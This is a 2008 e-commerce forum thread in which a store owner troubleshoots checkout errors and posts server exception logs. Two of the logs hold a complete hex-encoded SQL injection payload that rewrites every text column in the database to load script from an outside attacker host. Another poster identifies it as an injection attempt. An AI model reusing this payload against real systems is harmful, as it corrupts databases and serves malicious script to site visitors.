AbleCommerce Shopping Cart Software


http://forums.ablecommerce.com/

Errors not recording to error log (not all)

http://forums.ablecommerce.com/viewtopic.php?f=42&t=8326

Page 1 of 1

Errors not recording to error log (not all)

Posted: Thu Sep 25, 2008 6:17 am
by AlexG
I've no records in error log section on admin site but my customers have this error:
After full feel all records at checkout (credit card,shipping address and etc) and click PAY WITH CARD to receive the error 404(from server side
/Error_Page.html aspxerrorpath=/Checkout/Default.aspx ) but must be complete order page but this order adding to DB and I see in admin panel. But when the customer will order that product second time - he receive the complete order page. And I have 2 orders from one customer for one product!
________________________
AC version:
PLATFORM: ASP.NET
VERSION: 7.0
BUILD: 10125

DB: MS SQL 2000

Gateway: Authorize .Net
___________________________

I've added error handler into Applicatrion_OnError procedure of Glogal.asax and later this handler catched this error:

Code: Select all

/Sheer-Thigh-Hi-P8233.aspx?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
System.Data.SqlClient.SqlException: String or binary data would be truncated.
The statement has been terminated.
    at System.Data.SqlClient.SqlConnection.OnError(SqlException  
exception, Boolean breakConnection)
    at  
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException  
exception, Boolean breakConnection)
    at  
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject  
stateObj)
    at System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior,  
SqlCommand cmdHandler, SqlDataReader dataStream,  
BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj)
    at System.Data.SqlClient.SqlDataReader.ConsumeMetaData()
    at System.Data.SqlClient.SqlDataReader.get_MetaData()
    at  
System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds,  
RunBehavior runBehavior, String resetOptionsString)
    at  
System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior  
cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean  
async)
    at  
System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior  
cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String  
method, DbAsyncResult result)
    at  
System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior  
cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String  
method)
    at System.Data.SqlClient.SqlCommand.ExecuteScalar()
    at  
Microsoft.Practices.EnterpriseLibrary.Data.Database.DoExecuteScalar(DbCommand  
command)
    at  
Microsoft.Practices.EnterpriseLibrary.Data.Database.ExecuteScalar(DbCommand  
command)
    at CommerceBuilder.Reporting.PageView.Save()
    at CommerceBuilder.Services.AbleCommerceHttpModule.a(Object A_0,  
EventArgs A_1)
    at  
System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
    at System.Web.HttpApplication.ExecuteStep(IExecutionStep step,  
Boolean&  
completedSynchronously)--------------------------------------------------------------

BROWSER: IE-Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)   
IP Address: 219.141.14.11
How to fix all that errors???
Thanks.

Re: Errors not recording to error log (not all)

Posted: Thu Sep 25, 2008 5:23 pm
by AbleMods
Long time ago there were problems saving page views when the referrer URL or User Agent string was really, really large - like more than 250 characters long.

I see you're running SQL 2000 - it's possible the UserAgent field or the Referrer field is not large enough to store the value and it's crashing the SQL update.

Try increasing the size of those two fields in your ac_PageViews table and see if the problem goes away. They should be at least 255 chars in size.

MAKE A FULL BACKUP OF YOUR SQL DB FIRST

Re: Errors not recording to error log (not all)

Posted: Thu Sep 25, 2008 11:18 pm
by AlexG
SolunarServices wrote:Long time ago there were problems saving page views when the referrer URL or User Agent string was really, really large - like more than 250 characters long.

I see you're running SQL 2000 - it's possible the UserAgent field or the Referrer field is not large enough to store the value and it's crashing the SQL update.

Try increasing the size of those two fields in your ac_PageViews table and see if the problem goes away. They should be at least 255 chars in size.

MAKE A FULL BACKUP OF YOUR SQL DB FIRST
THANKS,
I try to do this but what about the error on complete order page? Did you know?

Re: Errors not recording to error log (not all)

Posted: Thu Sep 25, 2008 11:58 pm
by AbleMods
My theory is it will resolve that error.

You won't know until you expand the field sizes and try placing an order. It may not even do it for you - it may take someone with a much larger referrer or User Agent string. All you can do it try and see if the problem goes away.

Re: Errors not recording to error log (not all)

Posted: Fri Sep 26, 2008 2:19 am
by afm
Are you two pretty confident that the data is legit? That looks suspiciously like an SQL injection.

Re: Errors not recording to error log (not all)

Posted: Fri Sep 26, 2008 6:09 am
by AbleMods
I'm not confident of anything - the error is too ambiguous to be certain.

For all I know, the reported error has nothing to do with the problem. The OP is assuming the error captured is caused by the problem with checkout - there's a good possibility it has nothing to do with it.

Re: Errors not recording to error log (not all)

Posted: Fri Sep 26, 2008 10:13 am
by afm
Good point. The customer reports and the error the handler captured are probably unrelated. The error captured is definitely an attempt at SQL injection, although it seems to have failed (a good thing).

Re: Errors not recording to error log (not all)

Posted: Fri Sep 26, 2008 11:15 am
by AbleMods
I'm seeing daily attempts at SQL injection on my site. Creates these enormous event log errors.

Re: Errors not recording to error log (not all)

Posted: Mon Sep 29, 2008 6:52 am
by AlexG
SolunarServices wrote:My theory is it will resolve that error.

You won't know until you expand the field sizes and try placing an order. It may not even do it for you - it may take someone with a much larger referrer or User Agent string. All you can do it try and see if the problem goes away.
I've changed referrer URL andr User Agent from 250 characters to to 1000 !

But Today I've recieve the same error:

Code: Select all

/Sheer-Thigh-Hi-P8233.aspx?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
System.Data.SqlClient.SqlException: String or binary data would be truncated.
The statement has been terminated.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj)
   at System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream,
BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj)
   at System.Data.SqlClient.SqlDataReader.ConsumeMetaData()
   at System.Data.SqlClient.SqlDataReader.get_MetaData()
   at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String
resetOptionsString)
   at System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean
returnStream, Boolean async)
   at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean
returnStream, String method, DbAsyncResult result)
   at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean
returnStream, String method)
   at System.Data.SqlClient.SqlCommand.ExecuteScalar()
   at Microsoft.Practices.EnterpriseLibrary.Data.Database.DoExecuteScalar(DbCommand command)
   at Microsoft.Practices.EnterpriseLibrary.Data.Database.ExecuteScalar(DbCommand command)
   at CommerceBuilder.Reporting.PageView.Save()
   at CommerceBuilder.Services.AbleCommerceHttpModule.a(Object A_0, EventArgs A_1)
   at System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
   at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&
completedSynchronously)--------------------------------------------------------------

BROWSER: IE-Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)  IP Address: 74.64.96.184

Also a NEW ERROR at Checkout page!!

Code: Select all

/Checkout/Default.aspx
System.Web.HttpUnhandledException: Exception of type  
'System.Web.HttpUnhandledException' was thrown. --->  
System.ArgumentException: Item has already been added. Key in  
dictionary: 'store'  Key being added: 'store'
    at System.Collections.Hashtable.Insert(Object key, Object nvalue,  
Boolean add)
    at System.Collections.Hashtable.Add(Object key, Object value)
    at CommerceBuilder.Marketing.EmailList.ProcessSignupRequest(String email)
    at ConLib_Custom_OnePageCheckout.CheckedOut(Object sender,  
CheckedOutEventArgs e) in  
d:\hshome\bl\bodylingerie.com\ConLib\Custom\OnePageCheckout.ascx.cs:line  
1108
    at ASP.CreditCardPaymentForm.CreditCardButton_Click(Object sender,  
EventArgs e) in  
d:\hshome\bl\bodylingerie.com\Checkout\PaymentForms\CreditCardPaymentForm.ascx:line  
249
    at System.Web.UI.WebControls.Button.OnClick(EventArgs e)
    at System.Web.UI.WebControls.Button.RaisePostBackEvent(String  
eventArgument)
    at  
System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String  
eventArgument)
    at System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler  
sourceControl, String eventArgument)
    at System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData)
    at System.Web.UI.Page.ProcessRequestMain(Boolean  
includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
    --- End of inner exception stack trace ---
    at System.Web.UI.Page.HandleError(Exception e)
    at System.Web.UI.Page.ProcessRequestMain(Boolean  
includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
    at System.Web.UI.Page.ProcessRequest(Boolean  
includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
    at System.Web.UI.Page.ProcessRequest()
    at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
    at System.Web.UI.Page.ProcessRequest(HttpContext context)
    at ASP.checkout_default_aspx.ProcessRequest(HttpContext context)  
in c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET  
Files\root\e00d446b\29cae8c7\App_Web_wdd5iw86.2.cs:line 0
    at  
System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
    at System.Web.HttpApplication.ExecuteStep(IExecutionStep step,  
Boolean&  
completedSynchronously)--------------------------------------------------------------
Item has already been added. Key in dictionary: 'store'  Key being  
added: 'store'System.ArgumentException: Item has already been added.  
Key in dictionary: 'store'  Key being added: 'store'
    at System.Collections.Hashtable.Insert(Object key, Object nvalue,  
Boolean add)
    at System.Collections.Hashtable.Add(Object key, Object value)
    at CommerceBuilder.Marketing.EmailList.ProcessSignupRequest(String email)
    at ConLib_Custom_OnePageCheckout.CheckedOut(Object sender,  
CheckedOutEventArgs e) in  
d:\hshome\bl\bodylingerie.com\ConLib\Custom\OnePageCheckout.ascx.cs:line  
1108
    at ASP.CreditCardPaymentForm.CreditCardButton_Click(Object sender,  
EventArgs e) in  
d:\hshome\bl\bodylingerie.com\Checkout\PaymentForms\CreditCardPaymentForm.ascx:line  
249
    at System.Web.UI.WebControls.Button.OnClick(EventArgs e)
    at System.Web.UI.WebControls.Button.RaisePostBackEvent(String  
eventArgument)
    at  
System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String  
eventArgument)
    at System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler  
sourceControl, String eventArgument)
    at System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData)
    at System.Web.UI.Page.ProcessRequestMain(Boolean  
includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
BROWSER: IE-Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;  
FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET  
CLR 3.0.04506)  IP Address: 74.60.68.134
Referer: https://www.bodylingerie.com/Checkout/Default.aspx

PLEASE HELP ME TO FIX IT!!!

THANKS!!!!

Re: Errors not recording to error log (not all)

Posted: Mon Sep 29, 2008 7:07 am
by AbleMods
Well it was worth a try - something else is causing the problem apparently.

Change the field structure back to the way it was and post a support ticket with Able. They will be better suited to help you with it.

Sure looks like it's happening when the pageview is getting saved to the SQL table.
All times are UTC-05:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/